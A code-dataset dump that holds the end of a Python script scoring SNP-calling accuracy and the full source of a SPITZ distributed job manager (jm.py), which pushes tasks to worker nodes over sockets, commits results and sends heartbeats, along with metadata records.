result_file.write(\"%.5f\\t\" % (float(TP_NS)/float(TP_NS + FP_NS)))\n result_file.write(\"%.5f\\t\" % (float(TP_NS)/float(NS)))\n else:\n result_file.write(\"\\t\\t\")\n if TP_KAKS + FP_KAKS != 0 and KAKS != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS)/float(TP_KAKS + FP_KAKS)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKS)/float(KAKS)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(KAKID + NID) + \"\\t\")\n if TP_KAKID + FP_KAKID + TP_NID + FP_NID + FP_ID != 0 and KAKID + NID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID + TP_NID)/float(TP_KAKID + TP_NID + FP_KAKID + FP_NID + FP_ID)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID + TP_NID)/float(KAKID + NID)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(FP_ID) + \"\\t\")\n if TP_NID + FP_NID != 0 and NID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_NID)/float(TP_NID + FP_NID)))\n result_file.write(\"%.5f\\t\" % (float(TP_NID)/float(NID)))\n else:\n result_file.write(\"\\t\\t\")\n if TP_KAKID + FP_KAKID != 0 and KAKID != 0:\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID)/float(TP_KAKID + FP_KAKID)))\n result_file.write(\"%.5f\\t\" % (float(TP_KAKID)/float(KAKID)))\n else:\n result_file.write(\"\\t\\t\")\n\n result_file.write(str(NS) + \"\\t\" + str(TP_NS) + \"\\t\" + str(FP_NS) + \"\\t\")\n result_file.write(str(KAKS) + \"\\t\" + str(TP_KAKS) + \"\\t\" + str(FP_KAKS) + \"\\t\")\n\n result_file.write(str(NID) + \"\\t\" + str(TP_NID) + \"\\t\" + str(FP_NID) + \"\\t\")\n result_file.write(str(KAKID) + \"\\t\" + str(TP_KAKID) + \"\\t\" + str(FP_KAKID) + \"\\t\")\n\n result_file.write(result_dn + \"\\t\" + prefix_fn + \"\\t\" + cpu_num + \"\\t\" + str(ms) + \"\\t1\\t\")\n\n mem_time_file = os.path.join(result_path, prefix_fn + \".snpcall.\" + str(cpu_num) + \".log\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"# of no-aligned reads\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n result_file.write(str((1-float(tokens[1]))/rn) + \"\\t\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"time for initializing SNP caller\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"memstats after initializing SNP caller\" in tokens[0]:\n result_file.write(str(float(tokens[3])/10**9) + \"\\t\")\n if \"time for calling SNPs\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"memstats after calling SNPs\" in tokens[0]:\n result_file.write(str(float(tokens[3])/10**9) + \"\\t\")\n with open(mem_time_file) as f:\n for line in f:\n tokens = line.strip().split(\"\\t\")\n if \"Input parameters\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n if \"Parameters\" in tokens[0]:\n result_file.write(tokens[1] + \"\\t\")\n result_file.write(\"\\n\")\n\nresult_file.close()\n", "sub_path": "ivc-tools/old-test-scripts/0.5-test-scripts/isc-test-dwgsim-eval-all-pos.py", "file_name": "isc-test-dwgsim-eval-all-pos.py", "file_ext": "py", "file_size_in_byte": 10449, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path", "line_number": 184, "usage_type": "attribute"}]} +{"seq_id": "540922159", "text": "#!/usr/bin/env python\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2015 Caian Benedicto \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nfrom libspitz import JobBinary, SimpleEndpoint\nfrom libspitz import messaging, config\nfrom libspitz import memstat\nfrom libspitz import make_uid\nfrom libspitz import log_lines\n\nfrom libspitz import PerfModule\n\nimport Args\nimport sys, threading, os, time, logging, struct, traceback\n\n# Global configuration parameters\njm_killtms = None # Kill task managers after execution\njm_log_file = None # Output file for logging\njm_verbosity = None # Verbosity level for logging\njm_heart_timeout = None # Timeout for heartbeat response\njm_conn_timeout = None # Socket connect timeout\njm_recv_timeout = None # Socket receive timeout\njm_send_timeout = None # Socket send timeout\njm_send_backoff = None # Job Manager delay between sending tasks\njm_recv_backoff = None # Job Manager delay between sending tasks\njm_memstat = None # 1 to display memory statistics\njm_profiling = None # 1 to enable profiling\njm_perf_rinterv = None # Profiling report interval (seconds)\njm_perf_subsamp = None # Number of samples collected between report intervals\njm_heartbeat_interval = None\njm_jobid = None\n\n###############################################################################\n# Parse global configuration\n###############################################################################\ndef parse_global_config(argdict):\n global jm_killtms, jm_log_file, jm_verbosity, jm_heart_timeout, \\\n jm_conn_timeout, jm_recv_timeout, jm_send_timeout, jm_send_backoff, \\\n jm_recv_backoff, jm_memstat, jm_profiling, jm_perf_rinterv, \\\n jm_perf_subsamp, jm_heartbeat_interval, jm_jobid\n\n def as_int(v):\n if v == None:\n return None\n return int(v)\n\n def as_float(v):\n if v == None:\n return None\n return int(v)\n\n def as_bool(v):\n if v == None:\n return None\n return bool(v)\n\n jm_killtms = as_bool(argdict.get('killtms', True))\n jm_log_file = argdict.get('log', None)\n jm_verbosity = as_int(argdict.get('verbose', logging.INFO // 10)) * 10\n jm_heart_timeout = as_float(argdict.get('htimeout', config.heart_timeout))\n jm_conn_timeout = as_float(argdict.get('ctimeout', config.conn_timeout))\n jm_recv_timeout = as_float(argdict.get('rtimeout', config.recv_timeout))\n jm_send_timeout = as_float(argdict.get('stimeout', config.send_timeout))\n jm_recv_backoff = as_float(argdict.get('rbackoff', config.recv_backoff))\n jm_send_backoff = as_float(argdict.get('sbackoff', config.send_backoff))\n jm_memstat = as_int(argdict.get('memstat', 0))\n jm_profiling = as_int(argdict.get('profiling', 0))\n jm_perf_rinterv = as_int(argdict.get('rinterv', 60))\n jm_perf_subsamp = as_int(argdict.get('subsamp', 12))\n jm_heartbeat_interval = as_float(argdict.get('heartbeat-interval', 10))\n jm_jobid = argdict.get('jobid', '')\n\n###############################################################################\n# Configure the log output format\n###############################################################################\ndef setup_log():\n root = logging.getLogger()\n root.setLevel(jm_verbosity)\n root.handlers = []\n if jm_log_file == None:\n ch = logging.StreamHandler(sys.stderr)\n else:\n ch = logging.StreamHandler(open(jm_log_file, 'wt'))\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(threadName)s - '+\n '%(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n root.addHandler(ch)\n\n###############################################################################\n# Abort the aplication with message\n###############################################################################\ndef abort(error):\n logging.critical(error)\n exit(1)\n\n###############################################################################\n# Parse the definition of a proxy\n###############################################################################\ndef parse_proxy(cmd):\n cmd = cmd.split()\n\n if len(cmd) != 3:\n raise Exception()\n\n logging.debug('Proxy %s.' % (cmd[1]))\n\n name = cmd[1]\n gate = cmd[2].split(':')\n prot = gate[0]\n addr = gate[1]\n port = int(gate[2])\n\n return (name, { 'protocol' : prot, 'address' : addr, 'port' : port })\n\n###############################################################################\n# Parse the definition of a compute node\n###############################################################################\ndef parse_node(cmd, proxies):\n cmd = cmd.split()\n\n if len(cmd) < 2:\n raise Exception()\n\n logging.debug('Node %s.' % (cmd[1]))\n\n name = cmd[1]\n host = name.split(':')\n addr = host[0]\n port = int(host[1])\n\n # Simple endpoint\n if len(cmd) == 2:\n return (name, SimpleEndpoint(addr, port))\n\n # Endpoint behind a proxy\n elif len(cmd) == 4:\n if cmd[2] != 'through':\n raise Exception()\n\n proxy = proxies.get(cmd[3], None)\n if proxy == None:\n raise Exception()\n\n # Proxies are not supported yet...\n logging.info('Node %s is behind a proxy and will be ignored.' %\n (cmd[1]))\n return None\n\n # Unknow command format\n raise Exception()\n\n###############################################################################\n# Load the list of task managers from a file\n###############################################################################\ndef load_tm_list_from_file(filename = None):\n # Override the filename if it is empty\n if filename == None:\n nodefile = 'nodes.txt'\n filename = os.path.join('.', nodefile)\n\n logging.debug('Loading task manager list from %s...' % (filename,))\n\n # Read all lines\n try:\n with open(filename, 'rt') as file:\n lines = file.readlines()\n except:\n logging.warning('Error loading the list of task managers from file!')\n return {}\n\n lproxies = [parse_proxy(x.strip()) for x in lines if x[0:5] == 'proxy']\n proxies = {}\n\n for p in lproxies:\n if p != None:\n proxies[p[0]] = p[1]\n\n ltms = [parse_node(x.strip(), proxies) for x in lines if x[0:4] == 'node']\n tms = {}\n for t in ltms:\n if t != None:\n tms[t[0]] = t[1]\n\n return tms\n\n###############################################################################\n# Load the list of task managers from a file\n###############################################################################\ndef load_tm_list_from_dir(dirname = None):\n # Override the dirname if it is empty\n if dirname == None:\n dirname = 'nodes'\n\n logging.debug('Loading task manager list from %s...' % (dirname,))\n\n tms = {}\n\n # Read all files\n try:\n for f in os.listdir(dirname):\n f = os.path.join(dirname, f)\n if not os.path.isfile(f):\n continue\n tms.update(load_tm_list_from_file(f))\n except:\n logging.warning('Error loading the list of task ' +\n 'managers from directory!')\n return {}\n\n return tms\n\n###############################################################################\n# Load the list of task managers from a file\n###############################################################################\ndef load_tm_list():\n tms = load_tm_list_from_file()\n tms.update(load_tm_list_from_dir())\n logging.debug('Loaded %d task managers.' % (len(tms),))\n return tms\n\n###############################################################################\n# Exchange messages with an endpoint to begin pushing tasks\n###############################################################################\ndef setup_endpoint_for_pushing(e):\n try:\n # Try to connect to a task manager\n e.Open(jm_conn_timeout)\n except:\n # Problem connecting to the task manager\n # Because this is a connection event,\n # make it a debug rather than a warning\n logging.debug('Error connecting to task manager at %s:%d!',\n e.address, e.port)\n log_lines(traceback.format_exc(), logging.debug)\n e.Close()\n return\n try:\n # Send the job identifier\n e.WriteString(jm_jobid)\n\n # Ask if it is possible to send tasks\n e.WriteInt64(messaging.msg_send_task)\n\n # Verify job id of the answer\n jobid = e.ReadString(jm_recv_timeout)\n\n if jm_jobid != jobid:\n logging.error('Job Id mismatch from %s:%d! Self: %s, task manager: %s!',\n e.address, e.port, jm_jobid, jobid)\n e.Close()\n return False\n\n # Wait for a response\n response = e.ReadInt64(jm_recv_timeout)\n\n if response == messaging.msg_send_full:\n # Task mananger is full\n logging.debug('Task manager at %s:%d is full.',\n e.address, e.port)\n\n elif response == messaging.msg_send_more:\n # Continue to the task pushing loop\n return True\n\n else:\n # The task manager is not replying as expected\n logging.error('Unknown response from the task manager!')\n\n except:\n # Problem connecting to the task manager\n logging.warning('Error connecting to task manager at %s:%d!',\n e.address, e.port)\n log_lines(traceback.format_exc(), logging.debug)\n\n e.Close()\n return False\n\n###############################################################################\n# Exchange messages with an endpoint to begin reading results\n###############################################################################\ndef setup_endpoint_for_pulling(e):\n try:\n # Try to connect to a task manager\n e.Open(jm_conn_timeout)\n except:\n # Problem connecting to the task manager\n # Because this is a connection event,\n # make it a debug rather than a warning\n logging.debug('Error connecting to task manager at %s:%d!',\n e.address, e.port)\n log_lines(traceback.format_exc(), logging.debug)\n e.Close()\n return\n try:\n # Send the job identifier\n e.WriteString(jm_jobid)\n\n # Ask if it is possible to send tasks\n e.WriteInt64(messaging.msg_read_result)\n\n # Verify job id of the answer\n jobid = e.ReadString(jm_recv_timeout)\n\n if jm_jobid != jobid:\n logging.error('Job Id mismatch from %s:%d! Self: %s, task manager: %s!',\n e.address, e.port, jm_jobid, jobid)\n e.Close()\n return False\n\n return True\n\n except:\n # Problem connecting to the task manager\n logging.warning('Error connecting to task manager at %s:%d!',\n e.address, e.port)\n log_lines(traceback.format_exc(), logging.debug)\n\n e.Close()\n return False\n\n###############################################################################\n# Push tasks while the task manager is not full\n###############################################################################\ndef push_tasks(job, runid, jm, tm, taskid, task, tasklist, completed):\n # Keep pushing until finished or the task manager is full\n sent = []\n while True:\n if task == None:\n\n # Avoid calling next_task after it's finished\n if completed:\n logging.debug('There are no new tasks to generate.')\n return (True, 0, None, sent)\n\n # Only get a task if the last one was already sent\n newtaskid = taskid + 1\n r1, newtask, ctx = job.spits_job_manager_next_task(jm, newtaskid)\n\n # Exit if done\n if r1 == 0:\n return (True, 0, None, sent)\n\n if newtask == None:\n logging.error('Task %d was not pushed!', newtaskid)\n return (False, taskid, task, sent)\n\n if ctx != newtaskid:\n logging.error('Context verification failed for task %d!',\n newtaskid)\n return (False, taskid, task, sent)\n\n # Add the generated task to the tasklist\n taskid = newtaskid\n task = newtask[0]\n tasklist[taskid] = (0, task)\n\n logging.debug('Generated task %d with payload size of %d bytes.',\n taskid, len(task) if task != None else 0)\n\n try:\n logging.debug('Pushing %d...', taskid)\n\n # Push the task to the active task manager\n tm.WriteInt64(taskid)\n tm.WriteInt64(runid)\n if task == None:\n tm.WriteInt64(0)\n else:\n tm.WriteInt64(len(task))\n tm.Write(task)\n\n # Wait for a response\n response = tm.ReadInt64(jm_recv_timeout)\n\n if response == messaging.msg_send_full:\n # Task was sent, but the task manager is now full\n sent.append((taskid, task))\n task = None\n break\n\n elif response == messaging.msg_send_more:\n # Continue pushing tasks\n sent.append((taskid, task))\n task = None\n pass\n\n elif response == messaging.msg_send_rjct:\n # Task was rejected by the task manager, this is not\n # predicted for a model where just one task manager\n # pushes tasks, exit the task loop\n logging.warning('Task manager at %s:%d rejected task %d',\n tm.address, tm.port, taskid)\n break\n\n else:\n # The task manager is not replying as expected\n logging.error('Unknown response from the task manager!')\n break\n except:\n # Something went wrong with the connection,\n # try with another task manager\n logging.error('Error pushing tasks to task manager!')\n log_lines(traceback.format_exc(), logging.debug)\n break\n\n return (False, taskid, task, sent)\n\n###############################################################################\n# Read and commit tasks while the task manager is not empty\n###############################################################################\ndef commit_tasks(job, runid, co, tm, tasklist, completed):\n # Keep pulling until finished or the task manager is full\n n_errors = 0\n while True:\n try:\n # Pull the task from the active task manager\n taskid = tm.ReadInt64(jm_recv_timeout)\n\n if taskid == messaging.msg_read_empty:\n # No more task to receive\n return\n\n # Read the run id\n taskrunid = tm.ReadInt64(jm_recv_timeout)\n\n # Read the rest of the task\n r = tm.ReadInt64(jm_recv_timeout)\n ressz = tm.ReadInt64(jm_recv_timeout)\n res = tm.Read(ressz, jm_recv_timeout)\n\n # Tell the task manager that the task was received\n tm.WriteInt64(messaging.msg_read_result)\n\n # Warning, exceptions after this line may cause task loss\n # if not handled properly!!\n\n if r != 0:\n n_errors += 1\n if r == messaging.res_module_error:\n logging.error('The remote worker crashed while ' +\n 'executing task %d!', r)\n else:\n logging.error('The task %d was not successfully executed, ' +\n 'worker returned %d!', taskid, r)\n\n if taskrunid < runid:\n logging.debug('The task %d is from the previous run %d ' +\n 'and will be ignored!', taskid, taskrunid)\n continue\n\n if taskrunid > runid:\n logging.error('Received task %d from a future run %d!',\n taskid, taskrunid)\n continue\n\n # Validated completed task\n\n c = completed.get(taskid, (None, None))\n if c[0] != None:\n # This may happen with the fault tolerance system. This may\n # lead to tasks being put in the tasklist by the job manager\n # while being committed. The tasklist must be constantly\n # sanitized.\n logging.warning('The task %d was received more than once ' +\n 'and will not be committed again!',\n taskid)\n # Removed the completed task from the tasklist\n tasklist.pop(taskid, (None, None))\n continue\n\n # Remove it from the tasklist\n\n p = tasklist.pop(taskid, (None, None))\n if p[0] == None and c[0] == None:\n # The task was not already completed and was not scheduled\n # to be executed, this is serious problem!\n logging.error('The task %d was not in the working list!',\n taskid)\n\n r2 = job.spits_committer_commit_pit(co, res)\n\n if r2 != 0:\n logging.error('The task %d was not successfully committed, ' +\n 'committer returned %d', taskid, r2)\n\n # Add completed task to list\n completed[taskid] = (r, r2)\n\n except:\n # Something went wrong with the connection,\n # try with another task manager\n break\n if n_errors > 0:\n logging.warn('There were %d failed tasks' % (n_errors, ))\n\n\ndef infinite_tmlist_generator():\n ''' Iterates over TMs returned by the load_tm_list() method indefinitely.\n The result of a single iteration is a tuple containing (Finished, Name,\n TM), where Finished == True indicates if the currently listed TMs\n finished. The next iteration will read the TMs again, setting Finished to\n False.\n\n Conditions:\n Finished == True <=> (Name, TM) == (None, None)\n Finished == False <=> (Name, TM) != (None, None)\n\n Example:\n for isEnd, name, tm in infinite_tmlist_generator():\n if not isEnd:\n do something with the task manager (name, tm)\n else:\n all tms where processed, you can do post processing here. The\n next iteration will set isEnd to True and start over again'''\n tmlist = load_tm_list()\n while True:\n try:\n newtmlist = load_tm_list()\n if len(newtmlist) > 0:\n tmlist = newtmlist\n elif len(tmlist) > 0:\n logging.warning('New list of task managers is ' +\n 'empty and will not be updated!')\n except:\n if len(tmlist) > 0:\n logging.warning('New list of task managers is ' +\n 'empty and will not be updated!')\n for name, tm in tmlist.items():\n yield False, name, tm\n yield True, None, None\n\n\n###############################################################################\n# Heartbeat routine\n###############################################################################\ndef heartbeat(finished):\n global jm_heartbeat_interval\n t_last = time.clock()\n for isEnd, name, tm in infinite_tmlist_generator():\n if finished[0]:\n logging.debug('Stopping heartbeat thread...')\n return\n if isEnd:\n t_curr = time.clock()\n elapsed = t_curr - t_last\n t_last = t_curr\n sleep_for = max(jm_heartbeat_interval - elapsed, 0)\n time.sleep(sleep_for)\n else:\n try:\n tm.Open(jm_heart_timeout)\n except:\n # Problem connecting to the task manager\n # Because this is a connection event,\n # make it a debug rather than a warning\n logging.debug('Error connecting to task manager at %s:%d!',\n tm.address, tm.port)\n log_lines(traceback.format_exc(), logging.debug)\n tm.Close()\n continue\n try:\n # Send the job identifier\n tm.WriteString(jm_jobid)\n\n # Verify job id of the answer\n jobid = tm.ReadString(jm_recv_timeout)\n\n if jm_jobid != jobid:\n logging.error('Job Id mismatch from %s:%d! Self: %s, task manager: %s!',\n tm.address, tm.port, jm_jobid, jobid)\n tm.Close()\n continue\n\n # Send the heartbeat\n tm.WriteInt64(messaging.msg_send_heart)\n except:\n logging.warning('Error connecting to task manager at %s:%d!',\n tm.address, tm.port)\n log_lines(traceback.format_exc(), logging.debug)\n finally:\n tm.Close()\n\n\n###############################################################################\n# Job Manager routine\n###############################################################################\ndef jobmanager(argv, job, runid, jm, tasklist, completed):\n logging.info('Job manager running...')\n memstat.stats()\n\n # Load the list of nodes to connect to\n tmlist = load_tm_list()\n\n # Store some metadata\n submissions = [] # (taskid, submission time, [sent to])\n\n # Task generation loop\n\n taskid = 0\n task = None\n finished = False\n\n while True:\n # Reload the list of task managers at each\n # run so new tms can be added on the fly\n try:\n newtmlist = load_tm_list()\n if len(newtmlist) > 0:\n tmlist = newtmlist\n elif len(tmlist) > 0:\n logging.warning('New list of task managers is ' +\n 'empty and will not be updated!')\n except:\n logging.error('Failed parsing task manager list!')\n\n for name, tm in tmlist.items():\n logging.debug('Connecting to %s:%d...', tm.address, tm.port)\n\n # Open the connection to the task manager and query if it is\n # possible to send data\n if not setup_endpoint_for_pushing(tm):\n finished = False\n else:\n logging.debug('Pushing tasks to %s:%d...', tm.address, tm.port)\n\n # Task pushing loop\n memstat.stats()\n finished, taskid, task, sent = push_tasks(job, runid, jm,\n tm, taskid, task, tasklist, completed[0] == 1)\n\n # Add the sent tasks to the sumission list\n submissions = submissions + sent\n\n # Close the connection with the task manager\n tm.Close()\n\n logging.debug('Finished pushing tasks to %s:%d.',\n tm.address, tm.port)\n\n if finished and completed[0] == 0:\n # Tell everyone the task generation was completed\n logging.info('All tasks generated.')\n completed[0] = 1\n\n # Exit the job manager when done\n if len(tasklist) == 0 and completed[0] == 1:\n logging.debug('Job manager exiting...')\n return\n\n # Keep sending the uncommitted tasks\n # TODO: WARNING this will flood the system\n # with repeated tasks\n if finished and len(tasklist) > 0:\n if len(submissions) == 0:\n logging.critical('The submission list is empty but '\n 'the task list is not! Some tasks were lost!')\n\n # Select the oldest task that is not already completed\n while True:\n taskid, task = submissions.pop(0)\n if taskid in tasklist:\n break\n\n # Remove the committed tasks from the submission list\n submissions = [x for x in submissions if x[0] in tasklist]\n\n time.sleep(jm_send_backoff)\n\n###############################################################################\n# Committer routine\n###############################################################################\ndef committer(argv, job, runid, co, tasklist, completed):\n logging.info('Committer running...')\n memstat.stats()\n\n # Load the list of nodes to connect to\n tmlist = load_tm_list()\n\n # Result pulling loop\n while True:\n # Reload the list of task managers at each\n # run so new tms can be added on the fly\n try:\n newtmlist = load_tm_list()\n if len(newtmlist) > 0:\n tmlist = newtmlist\n elif len(tmlist) > 0:\n logging.warning('New list of task managers is ' +\n 'empty and will not be updated!')\n except:\n logging.error('Failed parsing task manager list!')\n\n for name, tm in tmlist.items():\n logging.debug('Connecting to %s:%d...', tm.address, tm.port)\n\n # Open the connection to the task manager and query if it is\n # possible to send data\n if not setup_endpoint_for_pulling(tm):\n continue\n\n logging.debug('Pulling tasks from %s:%d...', tm.address, tm.port)\n\n # Task pulling loop\n commit_tasks(job, runid, co, tm, tasklist, completed)\n memstat.stats()\n\n # Close the connection with the task manager\n tm.Close()\n\n logging.debug('Finished pulling tasks from %s:%d.',\n tm.address, tm.port)\n\n if len(tasklist) == 0 and completed[0] == 1:\n logging.info('All tasks committed.')\n logging.debug('Committer exiting...')\n return\n\n # Refresh the tasklist\n for taskid in completed:\n tasklist.pop(taskid, 0)\n\n time.sleep(jm_recv_backoff)\n\n###############################################################################\n# Kill all task managers\n###############################################################################\ndef killtms():\n logging.info('Killing task managers...')\n\n # Load the list of nodes to connect to\n tmlist = load_tm_list()\n\n for name, tm in tmlist.items():\n try:\n logging.debug('Connecting to %s:%d...', tm.address, tm.port)\n\n tm.Open(jm_conn_timeout)\n\n # Send the job identifier\n tm.WriteString(jm_jobid)\n\n # Read back the job id of the answer\n tm.ReadString(jm_recv_timeout)\n\n tm.WriteInt64(messaging.msg_terminate)\n tm.Close()\n except:\n # Problem connecting to the task manager\n logging.warning('Error connecting to task manager at %s:%d!',\n tm.address, tm.port)\n log_lines(traceback.format_exc(), logging.debug)\n\n###############################################################################\n# Run routine\n###############################################################################\ndef run(argv, jobinfo, job, runid):\n # List of pending tasks\n memstat.stats()\n tasklist = {}\n\n # Keep an extra list of completed tasks\n completed = {0: 0}\n\n # Start the job manager\n logging.info('Starting job manager jor job %d...', runid)\n\n # Create the job manager from the job module\n jm = job.spits_job_manager_new(argv, jobinfo)\n\n jmthread = threading.Thread(target=jobmanager,\n args=(argv, job, runid, jm, tasklist, completed))\n jmthread.start()\n\n # Start the committer\n logging.info('Starting committer for job %d...', runid)\n\n # Create the job manager from the job module\n co = job.spits_committer_new(argv, jobinfo)\n\n cothread = threading.Thread(target=committer,\n args=(argv, job, runid, co, tasklist, completed))\n cothread.start()\n\n # Wait for both threads\n jmthread.join()\n cothread.join()\n\n # Commit the job\n logging.info('Committing Job...')\n r, res, ctx = job.spits_committer_commit_job(co, 0x12345678)\n logging.debug('Job committed.')\n\n # Finalize the job manager\n logging.debug('Finalizing Job Manager...')\n job.spits_job_manager_finalize(jm)\n\n # Finalize the committer\n logging.debug('Finalizing Committer...')\n job.spits_committer_finalize(co)\n memstat.stats()\n\n if res == None:\n logging.error('Job did not push any result!')\n return messaging.res_module_noans, None\n\n if ctx != 0x12345678:\n logging.error('Context verification failed for job!')\n return messaging.res_module_ctxer, None\n\n logging.debug('Job %d finished successfully.', runid)\n return r, res[0]\n\n###############################################################################\n# Main routine\n###############################################################################\ndef main(argv):\n # Print usage\n if len(argv) <= 1:\n abort('USAGE: jm module [module args]')\n\n # Parse the arguments\n args = Args.Args(argv[1:])\n parse_global_config(args.args)\n\n # Setup logging\n setup_log()\n logging.debug('Hello!')\n\n # Enable memory debugging\n if jm_memstat == 1:\n memstat.enable()\n memstat.stats()\n\n # Enable perf module\n if jm_profiling:\n PerfModule(make_uid(), 0, jm_perf_rinterv, jm_perf_subsamp)\n\n # Load the module\n module = args.margs[0]\n job = JobBinary(module)\n\n # Remove JM arguments when passing to the module\n margv = args.margs\n\n # Keep a run identifier\n runid = [0]\n\n # Wrapper to include job module\n def run_wrapper(argv, jobinfo):\n runid[0] = runid[0] + 1\n return run(argv, jobinfo, job, runid[0])\n\n # Wrapper for the heartbeat\n finished = [False]\n def heartbeat_wrapper():\n heartbeat(finished)\n\n # Start the heartbeat\n threading.Thread(target=heartbeat_wrapper).start()\n\n # Run the module\n logging.info('Running module')\n memstat.stats()\n r = job.spits_main(margv, run_wrapper)\n memstat.stats()\n\n # Stop the heartbeat thread\n finished[0] = True\n\n # Kill the workers\n if jm_killtms:\n killtms()\n\n # Print final memory report\n memstat.stats()\n\n # Finalize\n logging.debug('Bye!')\n #exit(r)\n\n###############################################################################\n# Entry point\n###############################################################################\nif __name__ == '__main__':\n main(sys.argv)\n", "sub_path": "spitz-python/jm.py", "file_name": "jm.py", "file_ext": "py", "file_size_in_byte": 31433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.INFO", "line_number": 79, "usage_type": "attribute"}, {"api_name": "libspitz.config.heart_timeout", "line_number": 80, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 80, "usage_type": "name"}, {"api_name": "libspitz.config.conn_timeout", "line_number": 81, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 81, "usage_type": "name"}, {"api_name": "libspitz.config.recv_timeout", "line_number": 82, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 82, "usage_type": "name"}, {"api_name": "libspitz.config.send_timeout", "line_number": 83, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 83, "usage_type": "name"}, {"api_name": "libspitz.config.recv_backoff", "line_number": 84, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 84, "usage_type": "name"}, {"api_name": "libspitz.config.send_backoff", "line_number": 85, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 85, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 97, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 101, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 101, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 103, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 104, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 105, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 114, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 126, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 145, "usage_type": "call"}, {"api_name": "libspitz.SimpleEndpoint", "line_number": 154, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 182, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 189, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 215, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 227, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 239, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 253, "usage_type": 